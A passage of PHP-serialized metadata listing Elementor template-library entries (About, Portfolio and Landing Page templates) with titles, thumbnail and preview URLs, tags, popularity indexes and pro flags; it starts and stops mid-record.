Shop\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-about.png\";s:12:\"tmpl_created\";i:1499774130;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/about-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"Food\"]\";s:10:\"menu_order\";i:133;s:16:\"popularity_index\";i:403;s:11:\"trend_index\";i:584;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:653;a:14:{s:2:\"id\";i:1085;s:5:\"title\";s:21:\"About &#8211; Startup\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/03/Startup.png\";s:12:\"tmpl_created\";i:1488810874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/about-startup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:19:\"[\"About\",\"Startup\"]\";s:10:\"menu_order\";i:134;s:16:\"popularity_index\";i:8;s:11:\"trend_index\";i:10;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:654;a:14:{s:2:\"id\";i:143;s:5:\"title\";s:22:\"About &#8211; Personal\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0010.png\";s:12:\"tmpl_created\";i:1470820447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-personal/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"About\",\"Personal\"]\";s:10:\"menu_order\";i:135;s:16:\"popularity_index\";i:24;s:11:\"trend_index\";i:68;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:655;a:14:{s:2:\"id\";i:101;s:5:\"title\";s:16:\"About &#8211; CV\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0018.png\";s:12:\"tmpl_created\";i:1470829785;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:98:\"https://library.elementor.com/about-cv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"creative portfolio\",\"Personal\",\"portfolio\",\"professional\",\"resume\",\"vcard\"]\";s:10:\"menu_order\";i:136;s:16:\"popularity_index\";i:49;s:11:\"trend_index\";i:173;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:656;a:14:{s:2:\"id\";i:140;s:5:\"title\";s:25:\"About &#8211; Art Gallery\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0009.png\";s:12:\"tmpl_created\";i:1470820463;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/about-art-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"About\",\"Art\",\"Gallery\"]\";s:10:\"menu_order\";i:137;s:16:\"popularity_index\";i:18;s:11:\"trend_index\";i:41;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:657;a:14:{s:2:\"id\";i:213;s:5:\"title\";s:26:\"About &#8211; Architecture\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0008.png\";s:12:\"tmpl_created\";i:1470829766;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/about-architecture/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"About\",\"Architecture\"]\";s:10:\"menu_order\";i:138;s:16:\"popularity_index\";i:19;s:11:\"trend_index\";i:59;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:658;a:14:{s:2:\"id\";i:2802;s:5:\"title\";s:38:\"Portfolio &#8211; Fashion Photographer\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2017/11/Fashion-photographer-–-Portfolio.png\";s:12:\"tmpl_created\";i:1509615440;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/portfolio-fashion-photographer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:139;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:483;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:659;a:14:{s:2:\"id\";i:2828;s:5:\"title\";s:35:\"Landing Page &#8211; Law Convention\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2017/11/Law-Convention-–-Landing-Page.png\";s:12:\"tmpl_created\";i:1509631636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/landing-page-law-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:35:\"[\"Convention\",\"Landing Page\",\"Law\"]\";s:10:\"menu_order\";i:140;s:16:\"popularity_index\";i:367;s:11:\"trend_index\";i:560;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:660;a:14:{s:2:\"id\";i:1461;s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-1.png\";s:12:\"tmpl_created\";i:1494352121;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:127:\"[\"App\",\"author\",\"book\",\"brochure\",\"download\",\"e-book\",\"ebook\",\"marketing\",\"product\",\"publisher\",\"sell online\",\"seo\",\"showcase\"]\";s:10:\"menu_order\";i:141;s:16:\"popularity_index\";i:353;s:11:\"trend_index\";i:554;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:661;a:14:{s:2:\"id\";i:1460;s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-2.png\";s:12:\"tmpl_created\";i:1494352124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:142;s:16:\"popularity_index\";i:373;s:11:\"trend_index\";i:444;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:662;a:14:{s:2:\"id\";i:1459;s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-3.png\";s:12:\"tmpl_created\";i:1494352125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:143;s:16:\"popularity_index\";i:242;s:11:\"trend_index\";i:283;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:663;a:14:{s:2:\"id\";i:1052;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 1\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/03/app.png\";s:12:\"tmpl_created\";i:1488810873;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-mobile-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:144;s:16:\"popularity_index\";i:37;s:11:\"trend_index\";i:84;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:664;a:14:{s:2:\"id\";i:1505;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app3.png\";s:12:\"tmpl_created\";i:1494352110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:145;s:16:\"popularity_index\";i:395;s:11:\"trend_index\";i:598;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:665;a:14:{s:2:\"id\";i:726;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/01/convention-landing-page.jpg\";s:12:\"tmpl_created\";i:1485270062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:146;s:16:\"popularity_index\";i:438;s:11:\"trend_index\";i:539;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:666;a:14:{s:2:\"id\";i:1613;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 2\";s:9:\"thumbnail\";s:109:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-International-Womens-Day-Conference.png\";s:12:\"tmpl_created\";i:1494352129;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:147;s:16:\"popularity_index\";i:453;s:11:\"trend_index\";i:462;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:667;a:14:{s:2:\"id\";i:1612;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 3\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Tech-Conference.png\";s:12:\"tmpl_created\";i:1494352127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:148;s:16:\"popularity_index\";i:479;s:11:\"trend_index\";i:673;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:668;a:14:{s:2:\"id\";i:1614;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 4\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Sustainability-Conference.png\";s:12:\"tmpl_created\";i:1494352131;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:149;s:16:\"popularity_index\";i:382;s:11:\"trend_index\";i:532;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:669;a:14:{s:2:\"id\";i:906;s:5:\"title\";s:29:\"Landing Page &#8211;  Coacher\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/02/Landin-Page-Coacher.png\";s:12:\"tmpl_created\";i:1494352066;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-coacher/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:150;s:16:\"popularity_index\";i:279;s:11:\"trend_index\";i:379;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:670;a:14:{s:2:\"id\";i:879;s:5:\"title\";s:41:\"Landing Page &#8211; Financial Consultant\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Financial-consultant.png\";s:12:\"tmpl_created\";i:1494352064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/landing-page-financial-consultant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:151;s:16:\"popularity_index\";i:287;s:11:\"trend_index\";i:370;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:671;a:14:{s:2:\"id\";i:926;s:5:\"title\";s:33:\"Landing Page &#8211; Private Chef\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Private-Chef.png\";s:12:\"tmpl_created\";i:1494352068;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-private-chef/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:152;s:16:\"popularity_index\";i:401;s:11:\"trend_index\";i:542;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:672;a:14:{s:2:\"id\";i:1032;s:5:\"title\";s:27:\"Landing Page &#8211; Agency\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Agency.png\";s:12:\"tmpl_created\";i:1488810866;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/landing-page-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:153;s:16:\"popularity_index\";i:398;s:11:\"trend_index\";i:558;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:673;a:14:{s:2:\"id\";i:730;s:5:\"title\";s:24:\"Landing Page &#8211; App\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/app.-landing-page.jpg\";s:12:\"tmpl_created\";i:1485273430;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/landing-page-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:154;s:16:\"popularity_index\";i:358;s:11:\"trend_index\";i:525;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:674;a:14:{s:2:\"id\";i:643;s:5:\"title\";s:29:\"Landing Page &#8211; Festival\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2016/12/festival.jpg\";s:12:\"tmpl_created\";i:1481549290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-festival/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:155;s:16:\"popularity_index\";i:450;s:11:\"trend_index\";i:569;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:675;a:14:{s:2:\"id\";i:542;s:5:\"title\";s:28:\"Landing Page &#8211; Wedding\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0025.png\";s:12:\"tmpl_created\";i:1477388484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:156;s:16:\"popularity_index\";i:102;s:11:\"trend_index\";i:322;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:676;a:14:{s:2:\"id\";i:1187;s:5:\"title\";s:32:\"Landing Page &#8211; Photography\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp1-l.png\";s:12:\"tmpl_created\";i:1490707385;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-photography/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:157;s:16:\"popularity_index\";i:48;s:11:\"trend_index\";i:95;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:677;a:14:{s:2:\"id\";i:641;s:5:\"title\";s:28:\"Landing Page &#8211; Fashion\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/12/fashion-landing-page.jpg\";s:12:\"tmpl_created\";i:1481549264;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-fashion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:158;s:16:\"popularity_index\";i:328;s:11:\"trend_index\";i:457;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:678;a:14:{s:2:\"id\";i:189;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0005.png\";s:12:\"tmpl_created\";i:1470820715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-tourism/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:159;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:44;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:679;a:14:{s:2:\"id\";i:1547;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-1.png\";s:12:\"tmpl_created\";i:1494352115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:160;s:16:\"popularity_index\";i:345;s:11:\"trend_index\";i:617;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:680;a:14:{s:2:\"id\";i:1546;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-2.png\";s:12:\"tmpl_created\";i:1494352116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:161;s:16:\"popularity_index\";i:475;s:11:\"trend_index\";i:644;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:681;a:14:{s:2:\"id\";i:1545;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-3.png\";s:12:\"tmpl_created\";i:1494352118;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:162;s:16:\"popularity_index\";i:374;s:11:\"trend_index\";i:449;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:682;a:14:{s:2:\"id\";i:2714;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 5\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/11/Vacation-–-Landing-Page.png\";s:12:\"tmpl_created\";i:1509631782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:163;s:16:\"popularity_index\";i:366;s:11:\"trend_index\";i:544;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:683;a:14:{s:2:\"id\";i:195;s:5:\"title\";s:28:\"Landing Page &#8211; Product\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0006.png\";s:12:\"tmpl_created\";i:1470820765;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:164;s:16:\"popularity_index\";i:57;s:11:\"trend_index\";i:180;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:684;a:14:{s:2:\"id\";i:197;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0007.png\";s:12:\"tmpl_created\";i:1470825711;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-real-estate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:165;s:16:\"popularity_index\";i:136;s:11:\"trend_index\";i:383;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:685;a:14:{s:2:\"id\";i:1193;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 2\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";i:1490707422;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:166;s:16:\"popularity_index\";i:70;s:11:\"trend_index\";i:153;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:686;a:14:{s:2:\"id\";i:1415;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-1.png\";s:12:\"tmpl_created\";i:1494352106;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:167;s:16:\"popularity_index\";i:356;s:11:\"trend_index\";i:695;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:687;a:14:{s:2:\"id\";i:1414;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 4\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-2.png\";s:12:\"tmpl_created\";i:1494352107;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:168;s:16:\"popularity_index\";i:497;s:11:\"trend_index\";i:641;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:688;a:14:{s:2:\"id\";i:1413;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 5\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-3.png\";s:12:\"tmpl_created\";i:1494352109;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:134:\"[\"Agent\",\"business\",\"clean\",\"corporate\",\"flat\",\"google maps\",\"homes\",\"listing\",\"modern\",\"real estate\",\"realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";i:169;s:16:\"popularity_index\";i:433;s:11:\"trend_index\";i:442;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:689;a:14:{s:2:\"id\";i:1573;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-02.png\";s:12:\"tmpl_created\";i:1494352133;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:170;s:16:\"popularity_index\";i:526;s:11:\"trend_index\";i:622;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:690;a:14:{s:2:\"id\";i:1572;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-03.png\";s:12:\"tmpl_created\";i:1494352134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:171;s:16:\"popularity_index\";i:557;s:11:\"trend_index\";i:582;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:691;a:14:{s:2:\"id\";i:1570;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 